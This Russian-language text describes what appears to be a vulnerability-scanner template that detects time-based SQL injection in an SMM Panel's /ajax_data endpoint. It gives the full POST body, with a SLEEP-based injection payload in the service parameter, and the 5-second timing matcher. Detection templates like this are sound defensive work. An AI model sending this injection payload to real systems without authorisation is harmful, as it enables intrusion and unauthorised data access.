
Шаблон обнаружения SQL-инъекций на основе времени для SMM Panel. Отправляет сформированные POST-запросы к `/ajax_data` и выявляет уязвимые конечные точки через анализ задержки ответа.
Обнаружение SQL-инъекции с временной задержкой для SMM Panel
Этот шаблон обнаруживает SQL-инъекцию с временной задержкой в параметре service_detail SMM Panel через HTTP POST-запросы к /ajax_data. Эксплуатация может позволить удалённым злоумышленникам получить доступ к конфиденциальным данным или повысить привилегии.
Инструмент отправляет подготовленный POST-запрос:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
Если время ответа превышает 5 секунд, это указывает на уязвимую конечную точку.
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds
